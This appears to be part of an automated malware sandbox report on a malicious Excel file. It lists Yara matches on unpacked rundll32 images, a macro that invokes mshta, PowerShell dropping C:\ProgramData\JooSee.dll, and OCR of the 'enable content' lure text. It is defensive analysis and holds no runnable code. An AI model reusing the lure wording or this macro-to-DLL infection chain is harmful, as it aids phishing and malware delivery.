Source: Yara match File source: 15.2.rundll32.exe.4b0000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2410000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2100000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.29e0000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.4b0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2ed0000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.2d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.3180000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.3110000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2910000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2920000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.180000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2e40000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2870000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.a00000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.250000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2130000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.970000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.940000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2870000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.23a0000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2130000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2370000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2e10000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.30e0000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.250000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.300000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.340000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.3f0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.220000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.2d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2870000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2de0000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.680000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.360000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.4b0000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.390000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2de0000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2790000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.370000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2650000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2e70000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.480000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.28e0000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2410000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.3110000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2920000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.1b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2910000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.a00000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2730000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.27b0000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2e40000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.4a0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2730000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.30e0000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.3110000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.360000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.180000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.22f0000.5.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.4a0000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.480000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2370000.6.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.940000.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.10000000.12.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 9.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0000000F.00000002.679498941.0000000002E40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.620421483.0000000002651000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.679023916.00000000004B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.620926031.00000000030E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.623757227.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.619911631.0000000000221000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.620976859.0000000003111000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.620028804.0000000000391000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.679099785.0000000000971000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.679434577.00000000029E1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.561150759.0000000002130000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.679378273.0000000002920000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.561065386.00000000004A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.684161589.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.561626313.0000000003110000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.561662235.0000000003181000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.561110360.0000000002101000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.560982656.0000000000371000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.620781732.0000000002910000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.563589206.00000000001B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.623291568.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.561451631.0000000002871000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.561377294.0000000002410000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.620753571.00000000028E1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.563561570.0000000000180000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.623338464.0000000000301000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.563850517.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.561295967.00000000023A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.679539755.0000000002E71000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.678957905.00000000003F1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.620558528.00000000027B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.620134635.00000000004B0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.560945911.0000000000340000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.561541228.0000000002E11000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.561700746.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.619872548.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.679306140.0000000002791000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.679166369.0000000000A00000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.561513666.0000000002DE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.678995791.0000000000480000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.678823543.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.561271615.0000000002370000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000002.504836959.0000000000250000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.621014524.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.620852430.0000000002ED1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.620492443.0000000002730000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.679074321.0000000000940000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.619980737.0000000000360000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.561230347.00000000022F1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.620621291.0000000002870000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: C:\ProgramData\JooSee.dll, type: DROPPED

                            System Summary

                            Source: CJ68000754184.xls | Macro extractor: Sheet: REEEEEEEE contains: mshta
                            Source: Screenshot number: 4 | Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 16 17 18 19 20 21 22 C
                            Source: Screenshot number: 4 | Screenshot OCR: DOCUMENT IS PROTECTED. 10 11 12 13 Previewing is not available for protected documents. 14 15
                            Source: Screenshot number: 4 | Screenshot OCR: protected documents. 14 15 You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to pre
                            Source: Screenshot number: 4 | Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 16 17 18 19 20 21 22 Ci [.I 23 24 25 26
                            Source: Document image extraction number: 0 | Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
                            Source: Document image extraction number: 0 | Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
                            Source: Document image extraction number: 0 | Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                            Source: Document image extraction number: 0 | Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
                            Source: Document image extraction number: 1 | Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
                            Source: Document image extraction number: 1 | Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
                            Source: Document image extraction number: 1 | Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                            Source: Document image extraction number: 1 | Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
                            Source: CJ68000754184.xls | Stream path 'Workbook'
                            Source: CJ68000754184.xls.0.dr | Stream path 'Workbook'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\ProgramData\JooSee.dll
                            Source: CJ68000754184.xls | Initial sample: EXEC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0037F09B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0037EA99
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00381889
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0037EE81
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0037AEFB
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0038DCF7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0038A2E8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00389EEC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00374EE3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_003764E2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0038DEDC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0037B2C7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_003866CA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0037E2CC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00385CC4
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00377735
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0038473C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00390F33
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00378B3D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00376D24
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0038BB23
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00388519
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00380B19
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00379714
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0037BB7E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0038176B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00375361
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00378969
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0038CB5B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0037A55F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00382550
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0037CF47
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00374346
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0038894B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0037B74D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00375548
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_003781B7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_003909B5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_003751BB
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0038C3A0
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00387BA6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0037E991
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0038E395
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0038D389
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00379B83
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00384B87
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00386DF8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0037DFF3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0038DBEA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00388BE3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00387DD5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00372BD9
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00389BCF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00379DCF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0037E5CF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_10036007
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_10041050
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_1003130F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_100323E2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_10030460
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_10041592
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_1003E59F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_1003960C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_100317E2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_10040B0E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_10031BB6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_10041C56
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_10036CB5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_1001CD16
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_10042D21
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_10031FC2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001BF8FD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001BE991
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001BAB87
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001B9011
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001C0001
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001B2051
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001D0056
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001C907F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001BF09B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001C20BA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001B70B3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001C4116
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001B51BB
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001B81B7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001B2251
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001BE2CC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001BB2C7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001CA2E8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001B4346
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001B5361
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001CE395
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001CD389
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001D13AD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001CC3A0
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001CF435
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001C044F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001B64E2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001C8519
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001BA55F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001C2550
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001B5548
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001BE5CF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001C95FA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001C8606
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001CC631
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001CA666
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001BD6D8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001C66CA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001B9714
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001C473C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001B7735
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001BB74D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001C176B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001B4816
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001C1889
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001C894B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001B8969
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001D09B5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001B59F2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001CAA30
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001B1A56
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001BEA99
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001C0B19
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001B8B3D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001CBB23
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001CCB5B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001BBB7E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001B9B83
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001C4B87
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001C7BA6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001B2BD9
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001C9BCF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001CDBEA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001C8BE3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001D0C14
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001CAC3A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001B3C3C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001B7C37
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001B4C5D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001C6C49
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001C5CC4
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001CDCF7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001B6D24
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001C7DD5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001B9DCF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001C6DF8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001B3E3F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001D0E3A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001CBE27
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001C0E53
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001CAE6D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001B5E60
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001BEE81
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001CDEDC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001BAEFB
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001C9EEC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001B4EE3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001D0F33
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001BCF47
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001BDFF3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001B7FF2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00223C3C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00229011
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0023044F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002320BA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0022F8FD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0022D6D8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0023473C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00234116
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002413AD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0022AB87
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00227FF2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002259F2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002395FA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0023BE27
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0023C631
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0023AA30
